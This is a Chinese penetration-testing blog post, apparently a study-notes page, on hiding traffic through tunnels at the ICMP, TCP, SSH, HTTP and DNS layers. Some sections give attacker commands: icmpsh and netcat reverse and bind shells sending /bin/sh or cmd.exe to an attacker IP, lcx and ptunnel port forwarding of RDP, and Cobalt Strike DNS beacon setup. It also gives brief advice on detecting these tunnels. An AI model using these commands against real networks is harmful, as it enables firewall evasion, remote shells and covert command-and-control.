<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.1.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">
  <link rel="manifest" href="/images/manifest.json">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":true,"preload":true},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="网络层、运输层、应用层、socks代理、压缩数据、上传和下载">
<meta property="og:type" content="article">
<meta property="og:title" content="隐藏通信隧道">
<meta property="og:url" content="http://example.com/2022/02/17/%E9%9A%90%E8%97%8F%E9%80%9A%E4%BF%A1%E9%9A%A7%E9%81%93/index.html">
<meta property="og:site_name" content="Spring&#39;blog">
<meta property="og:description" content="网络层、运输层、应用层、socks代理、压缩数据、上传和下载">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/shiborui1913041042/shiborui1913041042.github.io/img/image-20220402090732542.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/shiborui1913041042/shiborui1913041042.github.io/img/image-20220402091737750.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/shiborui1913041042/shiborui1913041042.github.io/img/image-20220402092506527.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/shiborui1913041042/shiborui1913041042.github.io/img/image-20220402092938431.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/shiborui1913041042/shiborui1913041042.github.io/img/image-20220402093948502.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/shiborui1913041042/shiborui1913041042.github.io/img/image-20220402093550235.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/shiborui1913041042/shiborui1913041042.github.io/img/image-20220402123633553.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/shiborui1913041042/shiborui1913041042.github.io/img/image-20220402123728167.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/shiborui1913041042/shiborui1913041042.github.io/img/image-20220402123749265.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/shiborui1913041042/shiborui1913041042.github.io/img/image-20220402220039638.png">
<meta property="article:published_time" content="2022-02-17T00:53:33.000Z">
<meta property="article:modified_time" content="2022-04-03T05:23:02.704Z">
<meta property="article:author" content="Spring">
<meta property="article:tag" content="隐藏通信隧道">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/shiborui1913041042/shiborui1913041042.github.io/img/image-20220402090732542.png">

<link rel="canonical" href="http://example.com/2022/02/17/%E9%9A%90%E8%97%8F%E9%80%9A%E4%BF%A1%E9%9A%A7%E9%81%93/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>隐藏通信隧道 | Spring'blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Spring'blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">我还年轻，吃苦趁现在。</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签<span class="badge">14</span></a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类<span class="badge">7</span></a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档<span class="badge">14</span></a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2022/02/17/%E9%9A%90%E8%97%8F%E9%80%9A%E4%BF%A1%E9%9A%A7%E9%81%93/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpg">
      <meta itemprop="name" content="Spring">
      <meta itemprop="description" content="见到一座山，就想知道山后面是什么。">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Spring'blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          隐藏通信隧道
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2022-02-17 08:53:33" itemprop="dateCreated datePublished" datetime="2022-02-17T08:53:33+08:00">2022-02-17</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2022-04-03 13:23:02" itemprop="dateModified" datetime="2022-04-03T13:23:02+08:00">2022-04-03</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E5%86%85%E7%BD%91/" itemprop="url" rel="index"><span itemprop="name">内网</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>
            <div class="post-description">网络层、运输层、应用层、socks代理、压缩数据、上传和下载</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <span id="more"></span>

<h1 id="基础知识"><a href="#基础知识" class="headerlink" title="基础知识"></a>基础知识</h1><p>一般的网络通信，两个机器先建立TCP连接，然后正常数据通信，知道ip地址后可直接发送报文，不知道可以用域名解析，但是在实际中，可通过边界设备、软硬waf、ids检查阻断连接。</p>
<p>隧道就是绕过端口屏蔽的通信方式，waf两端数据包通过waf允许的数据包类型或端口进行封装，穿过防火墙，进行通信。当封装的数据包到达目的地，进行还原，并将其还原后的数据包发送到相应的服务器上。</p>
<p>CS、MSF无法上线，数据传输不稳定无回显、出口数据被监控、网络通信存在问题。</p>
<p>常用隧道：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">网络层：IPv6、ICMP、GRE</span><br><span class="line">传输层：TCP、UDP、常规端口</span><br><span class="line">应用层：SSH、HTTP、HTTPS、DNS</span><br></pre></td></tr></table></figure>

<h2 id="ICMP协议"><a href="#ICMP协议" class="headerlink" title="ICMP协议"></a>ICMP协议</h2><p>执行ping</p>
<p><img src="https://cdn.jsdelivr.net/gh/shiborui1913041042/shiborui1913041042.github.io/img/image-20220402090732542.png" alt="image-20220402090732542"></p>
<h2 id="TCP协议"><a href="#TCP协议" class="headerlink" title="TCP协议"></a>TCP协议</h2><p>netcat（nc）瑞士军刀，工具，通过使用TCP或者UDP协议的网络连接读写数据。</p>
<p><img src="https://cdn.jsdelivr.net/gh/shiborui1913041042/shiborui1913041042.github.io/img/image-20220402091737750.png" alt="image-20220402091737750"></p>
<h2 id="HTTP协议"><a href="#HTTP协议" class="headerlink" title="HTTP协议"></a>HTTP协议</h2><p>curl是一个利用url规则在命令行下工作的综合文件传输工具，支持文件上传下载。curl不仅支持HTTP、HTTPS、FTP等多种协议，还支持POST、Cookie、认证、从指定偏移处下载部分文件、用户代理字符串、限速、文件大小、进度条等特征。Linux操作系统自带curl命令。在Windows操作系统中,需要下载并安装curl命令</p>
<p>在使用curl时,需要执行“curl&lt; IP地址:端口号 &gt;”命令。如果远程主机开启了相应的端口，会输出相应的端口信息，如图3-3所示。如果远程主机没有开通相应的端口，则没有任何提示。按“Ctrl+C”键即可断开连接。</p>
<p><img src="https://cdn.jsdelivr.net/gh/shiborui1913041042/shiborui1913041042.github.io/img/image-20220402092506527.png" alt="image-20220402092506527"></p>
<h2 id="DNS协议"><a href="#DNS协议" class="headerlink" title="DNS协议"></a>DNS协议</h2><p>在进行 DNS连通性检测时，常用的命令为nslookup和 dig。<br>nslookup是 Windows操作系统自带的 DNS 探测命令，其用法如下所示。在没有指定 vps-ip时，nslookup 会从系统网络的TCP&#x2F;IP属性中读取 DNS服务器的地址。具体的使用方法是:打开Windows操作系统的命令行环境,输人“nslookup”命令,按“回车”键,然后输入“help”命令</p>
<p><img src="https://cdn.jsdelivr.net/gh/shiborui1913041042/shiborui1913041042.github.io/img/image-20220402092938431.png" alt="image-20220402092938431"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nslookup www.baidu.com vps-ip</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/shiborui1913041042/shiborui1913041042.github.io/img/image-20220402093948502.png" alt="image-20220402093948502"></p>
<p>dig是 Linux默认自带的 DNS 探测命令，其用法如下所示。在没有指定vps-ip时,dig会到<br>&#x2F;etc&#x2F;resolv.conf文件中读取系统配置的 DNS服务器的地址。如果vps-ip为192.168.43.1，将解析百度网的IP地址，说明目前DNS协议是连通的,如图3-5所示。具体的使用方法，可在 Linux命令行环境中输入“dig -h”命令获取。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dig @vps-ip www.baidu.com（解析结果）</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/shiborui1913041042/shiborui1913041042.github.io/img/image-20220402093550235.png" alt="image-20220402093550235"></p>
<p>还有一种情况是流量不能直接流出，需要在内网中设置代理服务器，常见于通过企业办公网段上网的场景。常用的判断方法如下。<br>    查看网络连接，判断是否存在与其他机器的8080（不绝对）等端口的连接（可以尝试运行”ping -n 1 -a ip”命令)。<br>②查看内网中是否有主机名类似于“proxy”的机器。</p>
<p>③查看IE浏览器的直接代理。</p>
<p>④根据pac文件的路径（可能是本地路径，也可能是远程路径)，将其下载下来并查看。</p>
<p>⑤执行如下命令，利用curl工具进行确认。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">curl www.baidu. com//不通</span><br><span class="line">curl -x proxy-ip:port www.baidu . com//通</span><br></pre></td></tr></table></figure>

<h1 id="网络层隧道技术"><a href="#网络层隧道技术" class="headerlink" title="网络层隧道技术"></a>网络层隧道技术</h1><p>在网络层中，两个常用的 隧道协议是IPv6和ICMP，下面进行介绍</p>
<h2 id="IPv6隧道"><a href="#IPv6隧道" class="headerlink" title="IPv6隧道"></a>IPv6隧道</h2><h3 id="技术简介"><a href="#技术简介" class="headerlink" title="技术简介"></a>技术简介</h3><p>“IPv6”是“Internet Protocol Version 6”的缩写，也被称为下一代互联网协议。它是由IETF设计用来代替现行的IPv4协议的一种新的IP协议。IPv4协议已经使用了20多年，目前面临着地址匮乏等一系列问题，而IPv6则能从根本上解决这些问题。现在，由于IPv4资源几乎耗尽，IPv6开始进入过渡阶段。</p>
<p>IPv6隧道技术是指通过IPv4隧道传送 IPv6 数据报文的技术。为了在IPv4海洋中传递IPv6信息，可以将IPv4作为隧道载体,将IPv6报文整体封装在IPv4数据报文中,使IPv6报文能够穿过IPv4海洋,到达另一个IPv6小岛。<br>打个比方，快递公司收取包裹之后，发现自己在目的地没有站点，无法投送，则将此包裹转交给能到达目的地的快递公司（例如中国邮政）来投递。也就是说，将快递公司已经封装好的包裹（类似于IPv6报文)，用中国邮政的包装箱再封装一次（类似于封装成IPv4报文)，以便这个包裹在中国邮政的系统（IPv4海洋）中被正常投递。</p>
<p>攻击者有时会通过恶意软件来配置允许进行IPv6通信的设备，以避开防火墙和入侵检测系统。有一点需要指出:即使设备支持IPv6，也可能无法正确分析封装了IPv6报文的IPv4数据包。<br>配置隧道和自动隧道的主要区别是:只有在执行隧道功能的节点的IPv6地址是 IPv4兼容地址时，自动隧道才是可行的。在为执行隧道功能的节点分配IP地址时,如果采用的是自动隧道方法，就不需要进行配置。<br>配置隧道方法则要求隧道末端节点使用其他机制来获得其IPv4地址，例如采用DHCP、人工配置或其他 IPv4的配置机制。<br>支持IPv6的隧道工具有socat、6tunnel、nt6tunnel 等。</p>
<h3 id="防御方法"><a href="#防御方法" class="headerlink" title="防御方法"></a>防御方法</h3><p>针对IPv6隧道攻击，最好的防御方法是:了解IPv6的具体漏洞，结合其他协议，通过防火墙和深度防御系统过滤IPv6通信,提高主机和应用程序的安全性。</p>
<h2 id="ICMP隧道"><a href="#ICMP隧道" class="headerlink" title="ICMP隧道"></a>ICMP隧道</h2><p>ICMP隧道简单、实用,是一个比较特殊的协议。在一般的通信协议里,如果两台设备要进行通信，肯定需要开放端口，而在ICMP协议下就不需要。最常见的ICMP消息为ping 命令的回复，攻击者可以利用命令行得到比回复更多的ICMP请求。在通常情况下，每个 ping命令都有相对应的回复与请求。</p>
<p>在一些网络环境中,如果攻击者使用各类上层隧道(例如 HTTP隧道、DNS隧道、常规正&#x2F;反向端口转发等）进行的操作都失败了，常常会通过ping 命令访问远程计算机，尝试建立ICMP隧道,将 TCP&#x2F;UDP 数据封装到ICMP的 ping 数据包中，从而穿过防火墙(通常防火墙不会屏蔽ping 数据包)，实现不受限制的网络访问。</p>
<p>常用的ICMP隧道工具有icmpsh、PingTunnel、icmptunnel、powershell icmp等。</p>
<h3 id="icmpsh"><a href="#icmpsh" class="headerlink" title="icmpsh"></a>icmpsh</h3><p>kali linux安装icmpsh</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git clone https://github.com/inquisb/icmpsh.git</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/shiborui1913041042/shiborui1913041042.github.io/img/image-20220402123633553.png" alt="image-20220402123633553"></p>
<p>安装 Python的 impacket类库,以便对TCP、UDP、ICMP、IGMP、ARP、IPv4、IPv6、SMB、MSRPC、NTLM、Kerberos、WMI、LDAP等协议进行访问。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">apt-get install python-impacket </span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/shiborui1913041042/shiborui1913041042.github.io/img/image-20220402123728167.png" alt="image-20220402123728167"></p>
<p>因为 icmpsh 工具要代替系统本身的 ping命令的应答程序，所以需要输入如下命令来关闭本地系统的ICMP应答(（如果要恢复系统应答，则设置为0)，否则 Shell 的运行会不稳定（表现为一直刷屏，无法进行交互输入)。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sysctl -w net.ipv4.icmp_echo_ignore_all=1</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/shiborui1913041042/shiborui1913041042.github.io/img/image-20220402123749265.png" alt="image-20220402123749265"></p>
<p>然后kali执行</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python icmpsh_m.py 本机ip 目标ip</span><br></pre></td></tr></table></figure>

<p>win7直接执行</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">icmpsh.exe -t 攻击机ip（kali）</span><br></pre></td></tr></table></figure>

<p>kali即可接受icmp反弹回来的shell</p>
<h3 id="PingTunnel"><a href="#PingTunnel" class="headerlink" title="*PingTunnel"></a>*PingTunnel</h3><p>PingTunnel也是一款常用的 ICMP隧道工具，可以跨平台使用。为了避免隧道被滥用，可以为隧道设置密码。</p>
<p>pingtunnel是把tcp&#x2F;udp&#x2F;sock5流量伪装成 icmp流量进行转发的工具</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">-p表示连接icmp隧道另一端的机器IP(即目标服务器)</span><br><span class="line">-lp表示需要监听的本地 tcp端口</span><br><span class="line">-da指定需要转发的机器的IP(即目标内网某—机器的内网IP)</span><br><span class="line">-dp指定需要转发的机器的端口(即目标内网某一机器的内网端口)</span><br><span class="line">-x设置连接的密码</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/shiborui1913041042/shiborui1913041042.github.io/img/image-20220402220039638.png" alt="image-20220402220039638"></p>
<p>Webserver: .&#x2F;ptunnel -x xiaodi （建立一个隧道，提供密码，等待别人连接）</p>
<p>Hacker xiaodi:.&#x2F;ptunnel -p 192.168.76.150 -lp 1080 -da 192.168.33.33 -dp 3389 -x xiaodi #转发的3389请求数据给本地1080</p>
<p>Hacker xiaodi: rdesktop 127.0.0.1 1080</p>
<p><a target="_blank" rel="noopener" href="https://github.com/f1vefour/ptunnel">老版本介绍</a>需自行编译</p>
<p><a target="_blank" rel="noopener" href="https://github.com/esrrhs/pingtunnel">新版本介绍</a>二次开发版本</p>
<h3 id="防御方法-1"><a href="#防御方法-1" class="headerlink" title="防御方法"></a>防御方法</h3><p>许多网络管理员会阻止ICMP通信进入站点。但是在出站方向,ICMP通信是被允许的，而且目前大多数的网络和边界设备不会过滤ICMP流量。使用ICMP隧道时会产生大量的ICMP数据包，我们可以通过Wireshark进行ICMP数据包分析，以检测恶意ICMP流量，具体方法如下。</p>
<p>·检测同一来源的icmp数据包的数量.一个正常的ping命令每秒最多发送两个数据包，而使用icmp隧道的浏览器会在很短的时间内产生上千个icmp数据包.</p>
<p>·注意那些Payload大于64bit的 ICMP数据包。</p>
<p>·寻找响应数据包中的Payload与请求数据包中的 Payload不一致的ICMP数据包。</p>
<p>·检查ICMP 数据包的协议标签。例如，icmptunnel 会在所有的 ICMP Payload前面添加“TUNL”标记来标识隧道——这就是特征。</p>
<h1 id="传输层隧道技术"><a href="#传输层隧道技术" class="headerlink" title="传输层隧道技术"></a>传输层隧道技术</h1><p>传输层技术包括TCP隧道、UDP隧道和常规端口转发等。在渗透测试中,如果内网防火墙阻止了对指定端口的访问，在获得目标机器的权限后，可以使用IPTABLES打开指定端口。如果内网中存在一系列防御系统,TCP、UDP 流量会被大量拦截。</p>
<h2 id="lcx端口转发"><a href="#lcx端口转发" class="headerlink" title="*lcx端口转发"></a>*lcx端口转发</h2><p>首先介绍最为经典的端口转发工具lcx。lcx是一个基于Socket套接字实现的端口转发工具，有Windows和 Linux两个版本。Windows版为 Icx.exe，Linux版为portmap。一个正常的Socket隧道必须具备两端:一端为服务端，监听一个端口，等待客户端的连接;另一端为客户端，通过传入服务端的IP地址和端口，才能主动与服务器连接。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"># 将本地 3389 给攻击 IP 的 3131</span><br><span class="line">lcx -slave 攻击 IP 3131 127.0.0.1 3389</span><br><span class="line"># 监听 3131 转发至 3333</span><br><span class="line">lcx -listen 3131 3333</span><br></pre></td></tr></table></figure>



<h2 id="netcat"><a href="#netcat" class="headerlink" title="*netcat"></a>*netcat</h2><p>之所以叫作netcat，是因为它是网络上的cat。cat 的功能是读取一个文件的内容并输出到屏幕上，netcat 也是如此——从网络的一端读取数据，输出到网络的另一端（可以使用TCP和 UDP协议)。</p>
<p>正向：攻击连接受害</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"># 受害</span><br><span class="line">nc -ldp 1234 -e /bin/sh</span><br><span class="line">nc -ldp 1234 -e c:\windows\system32\cmd.exe</span><br><span class="line"></span><br><span class="line"># 攻击主动连接</span><br><span class="line">nc 192.168.76.132 1234（受害者的ip地址）</span><br></pre></td></tr></table></figure>



<p>反向：受害连接攻击</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"># 攻击</span><br><span class="line">nc -lvp 1234</span><br><span class="line"></span><br><span class="line"># 受害主动连接</span><br><span class="line">nc 攻击主机 IP 1234 -e /bin/sh</span><br><span class="line">nc 攻击主机 IP 1234 -e c:\windows\system32\cmd.exe</span><br></pre></td></tr></table></figure>



<p>多向连接反弹shell-配合转发</p>
<p>god\Webserver: Lcx.exe -listen 22223333<br>god\Sqlserver: nc 192.168.3.31 2222 -e c:\windows\system32\cmd.exe</p>
<p>kali或本机: nc -v 192.168.76.1433333</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">指纹服务: nc -nv 192.168.76.143</span><br><span class="line">端口扫描: nc -v -z 192.168.76.143 1-100</span><br><span class="line">端口监听: nc -lvp xxxx</span><br><span class="line">文件传输: nc -lp 1111 &gt;1.txt|nc -vn xx.XX.X.x 1111 &lt;1.txt -q 1</span><br><span class="line">反弹Shell:见上</span><br></pre></td></tr></table></figure>



<h2 id="PowerCat"><a href="#PowerCat" class="headerlink" title="PowerCat"></a>PowerCat</h2><p>PowerCat可以说是nc 的 PowerShell 版本。PowerCat可以通过执行命令回到本地运行，也可以使用远程权限运行。</p>
<h1 id="应用层隧道技术"><a href="#应用层隧道技术" class="headerlink" title="应用层隧道技术"></a>应用层隧道技术</h1><h2 id="SSH协议"><a href="#SSH协议" class="headerlink" title="SSH协议"></a>SSH协议</h2><p>在内网中,几乎所有的Linux&#x2F;UNIX服务器和网络设备都支持SSH协议。在一般情况下,SSH协议是被允许通过防火墙和边界设备的，所以经常被攻击者利用。同时，SSH协议的传输过程是加密的,所以我们很难区分合法的SSH会话和攻击者利用其他网络建立的隧道。攻击者使用SSH端口隧道突破防火墙的限制后,能够建立-一些之前无法建立的TCP连接。</p>
<h2 id="HTTP-x2F-HTTPS"><a href="#HTTP-x2F-HTTPS" class="headerlink" title="HTTP&#x2F;HTTPS"></a>HTTP&#x2F;HTTPS</h2><p>HTTP Service代理用于将所有的流量转发到内网。常见的代理工具有reGeorg、meterpreter,tunna 等。</p>
<h2 id="DNS协议-1"><a href="#DNS协议-1" class="headerlink" title="*DNS协议"></a>*DNS协议</h2><p>​    DNS协议是一种请求&#x2F;应答协议，也是一种可用于应用层的隧道技术。虽然激增的DNS流量可能会被发现,但基于传统Socket隧道已经濒临淘汰及TCP、UDP通信大量被防御系统拦截的状况，DNS、ICMP、HTTP&#x2F;HTTPS等难以被禁用的协议已成为攻击者控制隧道的主流渠道。<br>​    通过本章前面的内容，我们已经对隧道技术有了一定的了解。一方面，在网络世界中，DNS是一个必不可少的服务;另一方面，DNS 报文本身具有穿透防火墙的能力。由于防火墙和入侵检测设备大都不会过滤 DNS流量，也为DNS成为隐蔽信道创造了条件。越来越多的研究证明，DNS隧道在僵尸网络和APT攻击中扮演着重要的角色。<br>​    用于管理僵尸网络和进行APT攻击的服务器叫作C&amp;C服务器(Command and Control Server,命令及控制服务器)。C&amp;C节点分为两种，分别是C&amp;C服务端(攻击者)和C&amp;C客户端（被控制的计算机)。C&amp;C通信是指植入C&amp;C客户端的木马或者后门程序与C&amp;C服务端上的远程控制程序之间的通信。正常网络之间的通信,都是在两台机器之间建立TCP 连接后进行的。在进行数据通信时:如果目标是IP地址，可以直接发送报文;如果目标是域名，会先将域名解析成IP地址，再进行通信。两台机器建立连接后,C&amp;C服务端就可以将指令传递给C&amp;C客户端上的木马(后门)程序，让其受到控制。</p>
<p>​        内网中安装了各种软&#x2F;硬件防护设施来检查主机与外部网络的连接情况很多厂商会收集C&amp;C服务端的域名、IP地址、URL等数据，帮助防火墙进行阻断操作。这样一来，C&amp;C通信就会被切断。于是，通过各种隧道技术实现C&amp;C通信的技术（特别是DNS隧道技术)出现了。<br>​        DNS隧道的工作原理很简单:在进行DNS查询时，如果查询的域名不在 DNS服务器本机的缓存中，就会访问互联网进行查询，然后返回结果。如果在互联网上有一台定制的服务器，那么依靠 DNS协议即可进行数据包的交换。从 DNS 协议的角度看，这样的操作只是在一次次地查询某个特定的域名并得到解析结果，但其本质问题是，预期的返回结果应该是一个IP地址，而事实上不是——返回的可以是任意字符串，包括加密的C&amp;C指令。</p>
<p>1.云主机Teamserver配置端口53 启用-udp</p>
<p>2.买一个域名，修改解析记录如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">A记录-&gt;cs主机名-&gt;CS服务器IP</span><br><span class="line">NS记录-&gt;ns1主机名-&gt;上个A记录地址</span><br><span class="line">NS记录-&gt;ns2主机名-&gt;上个A记录地址</span><br></pre></td></tr></table></figure>



<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">beacon&gt; checkin</span><br><span class="line">[*]Tasked beacon to checkin</span><br><span class="line">beacon&gt; mode dns-txt</span><br><span class="line">beacon&gt; shell whoami</span><br></pre></td></tr></table></figure>


    </div>

    
    
    
        <div class="reward-container">
  <div>原创技术分享，您的支持将鼓励我继续创作</div>
  <button onclick="var qr = document.getElementById('qr'); qr.style.display = (qr.style.display === 'none') ? 'block' : 'none';">
    打赏
  </button>
  <div id="qr" style="display: none;">
      
      <div style="display: inline-block;">
        <img src="/images/wechatpay.jpg" alt="Spring 微信支付">
        <p>微信支付</p>
      </div>
      
      <div style="display: inline-block;">
        <img src="/images/alipay.jpg" alt="Spring 支付宝">
        <p>支付宝</p>
      </div>

  </div>
</div>

        

  <div class="followme">
    <p>欢迎关注我的其它发布渠道</p>

    <div class="social-list">

        <div class="social-item">
          <a target="_blank" class="social-link" href="/images/wechat_channel.jpg">
            <span class="icon">
              <i class="fab fa-weixin"></i>
            </span>

            <span class="label">WeChat</span>
          </a>
        </div>
    </div>
  </div>


	  
      <footer class="post-footer">
